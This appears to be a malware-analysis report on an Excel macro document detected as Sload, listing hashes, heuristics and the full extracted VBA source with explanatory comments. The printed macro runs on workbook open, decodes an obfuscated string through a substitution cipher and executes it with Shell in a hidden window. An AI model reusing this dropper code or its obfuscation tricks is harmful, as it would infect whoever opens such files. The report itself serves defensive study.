Sload — Office (OLE) malware analysis

Static analysis result for SHA-256 e81e4db6a360c99f…

MALICIOUS

Office (OLE)

57.5 KB · Created: 2018-09-18 16:10:06 · Authoring application: Microsoft Excel · First seen: 2019-05-31
MD5: a628323455d1f19d1115e1626d1fabce SHA-1: 552f531d1f8cba28da5fcc376abbc5647f438c69 SHA-256: e81e4db6a360c99f1d8cf01dffa8dbe8268564049a95f9bbfc1e01e6ae74dabe
222 Risk Score

Malware Insights

Sload · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The file is an Excel document containing a Workbook_Open VBA macro. The call chain that macro starts ends in a Shell() call, indicating an attempt to execute a decoded command when the document is opened. ClamAV detection identifies this as Sload malware. The VBA is heavily obfuscated, but the Workbook_Open auto-execution and the Shell() call are clear indicators of malicious intent.

Heuristics 6

  • ClamAV: Xls.Malware.Sload-6786370-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Sload-6786370-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.day.com/dam/1.0 — in document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — in document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/ — in document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — in document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4054 bytes
SHA-256: 5918085136bf04836ee55b7cdfde877eaf0709e92a76ca7485b31452c744f946
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-execution entry point: runs when the workbook is opened (the
' OLE_VBA_WBOPEN finding). It passes a fixed string to top(), which
' stores it in the CmdLineParser member of the ucontext_t module. The
' value itself is never read again, so the assignment's purpose appears
' to be raising the CmdLineParser_Change event defined in ucontext_t
' — confirm against the form design.
Private Sub Workbook_Open()
pex2 = "pex2"
pex = top(pex2)
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "coprocessor"
' Writes its argument into ucontext_t.CmdLineParser and nothing else.
' No return value is assigned, so the caller receives Empty; the side
' effect on the ucontext_t member is the only reason this exists.
Function top(PEXCEPTION_POINTERS)
ucontext_t.CmdLineParser = PEXCEPTION_POINTERS
End Function

Attribute VB_Name = "CYGWIN"
' Decode-and-dispatch stage. The long literal is run through a() (the
' substitution decoder below) and the result is parked in
' ucontext_t.malloc. CInt("30E+10000") is far outside Integer range and
' raises an overflow error; with On Error Resume Next that error is
' swallowed, so dwVar keeps the value 2 and the If body executes.
' Assigning ucontext_t.signo raises the signo_Change handler, which is
' where Shell is actually invoked. The overflow check reads like a guard
' against environments that do not raise on overflow — TODO confirm.
Function ULONG()
ucontext_t.malloc = a("m(j4)m4fdyuihzuvv4[]fdyuihzuvv4[[ka'mosd'4""u$}hois'l.4,hsbuodogv{\$'uy:d""xumo4hphou(-'uo-yu""mvsu'o{-jdy'vdgjksvu$,hsbuodogv%]] o(f _tdkoygiu-unu]]{|hogio:fidmuhh4]] o(f _tdkoygiu-unu]]|;oip\""u$]]zoof3))""mlkv-md()hj'-aty]]{;mgomz\""u$]]zoof3))a""us'm-md()hj'-aty]]{;][[424dao:ksvu4:u'mdjs'l4ghmss4:ksvufgoz4 o(f _tttttttttttttttttttt-""go|4hogio:fidmuhh4] o(f _tttttttttttttttttttt-""go]4:ys'jdyhopvu4zsjju'[")
dwVar = 2
' Overflow error expected here; swallowed by Resume Next, dwVar stays 2.
On Error Resume Next
dwVar = CInt("30E+10000")
If dwVar = 2 Then
' Triggers signo_Change (Shell) with the decoded text.
ucontext_t.signo = ucontext_t.malloc
End If
ULONG = 1
End Function

Attribute VB_Name = "specific"
' Decoder driver. Initialises the output accumulator (further) to "" and
' the 1-based read position (SIGFPE) to 1, then hands both to DWORD64,
' which walks the input recursively one character at a time. Returns the
' decoded text.
Function a(NO_UNIX_BACKTRACE_SUPPORT)
further = ""
SIGFPE = 1
DWORD64 SIGFPE, further, NO_UNIX_BACKTRACE_SUPPORT
a = further
End Function

' Recursive per-character decode step (a loop written as recursion).
' While redistribute (1-based index) <= Len(mytstack): take the character
' at that index (Right(Left(s, i), 1)), find its position in the alphabet
' held in ucontext_t.SIGBUS via Software(), and append the character
' 4 positions earlier in that alphabet (up() handles the wrap-around).
' redistribute and low are ByRef, so the caller sees the final values.
' Recursion depth equals the length of the encoded string.
Function DWORD64(ByRef redistribute, ByRef low, mytstack)
licenses = Len(mytstack)
If redistribute <= licenses Then
low = low + up(Software(Right(Left(mytstack, redistribute), 1)), 4)
redistribute = redistribute + 1
DWORD64 redistribute, low, mytstack
End If
End Function

' Shift half of the substitution cipher. Returns the single character at
' 1-based position (printing - settings) of ucontext_t.SIGBUS; when that
' index would be < 1 it wraps to the end of the string
' (Len + printing - settings). Right(Left(s, k), 1) is simply "character
' k of s".
Function up(printing, settings)
If printing - settings < 1 Then
up = Right(Left(ucontext_t.SIGBUS, Len(ucontext_t.SIGBUS) + printing - settings), 1)
Else
up = Right(Left(ucontext_t.SIGBUS, printing - settings), 1)
End If
End Function

' Lookup half of the substitution cipher. Returns the 1-based position of
' character fprintf within ucontext_t.SIGBUS, as found by strings().
' Windows1 starts at 1, so a character that strings() never matches
' yields 1 rather than an error.
Function Software(fprintf)
bStackBelowHeap = 1
Windows1 = 1
strings bStackBelowHeap, Windows1, fprintf
Software = Windows1
End Function
  
' Linear search written as tail recursion: compares fprintf with the
' character at position bStackBelowHeap of ucontext_t.SIGBUS and either
' advances the index and recurses, or writes the match position into
' Windows (ByRef). Note the guard is "<" rather than "<=", so the final
' character of the alphabet is never tested; an unmatched character
' leaves Windows unchanged.
Function strings(ByRef bStackBelowHeap, ByRef Windows, fprintf)
UNUSED = ucontext_t.SIGBUS
licenses = Len(UNUSED)
If bStackBelowHeap < licenses Then
    If fprintf <> Right(Left(UNUSED, bStackBelowHeap), 1) Then
    bStackBelowHeap = bStackBelowHeap + 1
    strings bStackBelowHeap, Windows, fprintf
    Else
    Windows = bStackBelowHeap
    End If
End If
End Function

Attribute VB_Name = "ucontext_t"
Attribute VB_Base = "0{08B9E9C0-6FFB-4718-8161-A87BACED206B}{A9B41FEF-6FD0-4F2E-9396-9B344E544D11}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


' Change handler for the signo member of ucontext_t: runs when ULONG
' stores the decoded text there. The run of dwVar assignments has no
' effect (dwVar is never read afterwards) and looks like padding to
' bulk out the handler. The last line executes the decoded string as a
' command via Shell with window style 0 (hidden window) — this is the
' OLE_VBA_SHELL finding and the point at which the sample leaves the
' Office process.
Private Sub signo_Change()
without = ucontext_t.signo
dwVar = 100
dwVar = 99
dwVar = 98
dwVar = 97
dwVar = 96
dwVar = 95
dwVar = 94
dwVar = 93
dwVar = 92
dwVar = 91
dwVar = 90
dwVar = 89
dwVar = 88
dwVar = 87
dwVar = 86
dwVar = 85
dwVar = 84
dwVar = 83
dwVar = 82
dwVar = 81
dwVar = 80
dwVar = 79
dwVar = 78
dwVar = 0
' Decoded command, hidden window.
Shell without, 0
End Sub

' Change handler for the CmdLineParser member of ucontext_t; raised by
' the assignment in top() during Workbook_Open. Its only job is to call
' ULONG, which starts the decode-and-execute chain.
Private Sub CmdLineParser_Change()
ULONG
End Sub